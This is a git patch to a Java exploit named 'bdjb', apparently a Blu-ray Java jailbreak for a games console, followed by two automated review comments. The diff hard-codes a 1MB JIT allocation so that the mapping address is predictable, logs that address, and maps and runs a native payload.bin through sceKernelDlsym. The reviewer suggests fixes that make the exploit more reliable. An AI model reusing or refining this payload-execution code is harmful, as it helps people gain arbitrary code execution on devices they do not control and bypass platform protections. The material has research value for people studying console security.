From 3314b0e7bca60f60bf8be184afe8dd777c1dbbec Mon Sep 17 00:00:00 2001
From: Andy Nguyen
Date: Wed, 27 Oct 2021 21:12:07 +0200
Subject: [PATCH] Reduce JIT allocation size to 1MB.
---
 com/bdjb/Exploit.java | 5 ++++-
 com/bdjb/JIT.java | 10 +++++-----
 2 files changed, 9 insertions(+), 6 deletions(-)
diff --git a/com/bdjb/Exploit.java b/com/bdjb/Exploit.java
index 407a4d4..f0bc955 100644
--- a/com/bdjb/Exploit.java
+++ b/com/bdjb/Exploit.java
@@ -79,8 +79,11 @@ class Exploit implements Runnable {
 socket.close();
- Screen.println("[*] Executing payload...");
+ Screen.println("[*] Mapping payload...");
 long payload = jit.mapPayload("/OS/HDD/download0/mnt_ada/payload.bin", 0x4000);
+ Screen.println("[+] payload: " + Long.toHexString(payload));
+
+ Screen.println("[*] Executing payload...");
 int ret = (int) api.call(payload, api.dlsym(API.LIBKERNEL_MODULE_HANDLE, "sceKernelDlsym"));
 Screen.println("[+] Result: " + ret);
 } catch (Exception e) {
diff --git a/com/bdjb/JIT.java b/com/bdjb/JIT.java
index 6fb3417..c45acbd 100644
--- a/com/bdjb/JIT.java
+++ b/com/bdjb/JIT.java
@@ -149,12 +149,12 @@ public final class JIT {
 throw new IllegalArgumentException("Invalid data section offset.");
 }
- // TODO: Currently we just use maximum size so that the address is predictable.
- long size = MAX_CODE_SIZE;
+ // TODO: Currently we hardcode the size so that the address is predictable.
+ long size = 1 * 1024 * 1024;
 // long size = file.length() + 0x88 + ALIGNMENT - 1;
- // if (size >= MAX_CODE_SIZE) {
- // throw new IllegalArgumentException("Payload is too big.");
- // }
+ if (size >= MAX_CODE_SIZE) {
+ throw new IllegalArgumentException("Payload is too big.");
+ }
 // Allocate JIT memory.
 long name = api.malloc(4);
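Review bot: The new `[+] payload:` line prints the mapped address via `Long.toHexString` with no radix prefix, while the neighbouring `[+] Result:` line prints a decimal, so a reader of the on-screen log cannot tell which base each value is in; a small wording fix is `Screen.println("[+] payload: 0x" + Long.toHexString(payload));`. The address is only logged here, which is fine for a debugging aid, but note that it now appears on screen before the payload runs, so anyone reading the log learns the JIT mapping address. The enclosing method (the `run()` body of `Exploit`) begins and ends outside this hunk.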
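Review bot: The re-enabled `if (size >= MAX_CODE_SIZE)` check now compares a hard-coded constant (`1 * 1024 * 1024`) against another constant, so it never looks at the actual payload: a `payload.bin` larger than the 1MB region minus its header is not rejected, and whatever copies the file into the JIT mapping (outside this hunk, not visible here) would write past the allocation. The commented-out `// long size = file.length() + 0x88 + ALIGNMENT - 1;` shows the real requirement; if `file` is in scope at this point, keep the fixed allocation for the predictable address but bound the payload against it: `long required = file.length() + 0x88 + ALIGNMENT - 1;` and `if (required > size || size >= MAX_CODE_SIZE) {`, leaving the existing `throw new IllegalArgumentException("Payload is too big.");` in place. With that, the "Payload is too big." message is also accurate, which it currently is not. As a minor style point, `1 * 1024 * 1024` is `int` arithmetic widened to `long`; a named constant such as `private static final long JIT_ALLOC_SIZE = 1L << 20;` would document the intent the TODO describes. `mapPayload` starts before this hunk and continues after it.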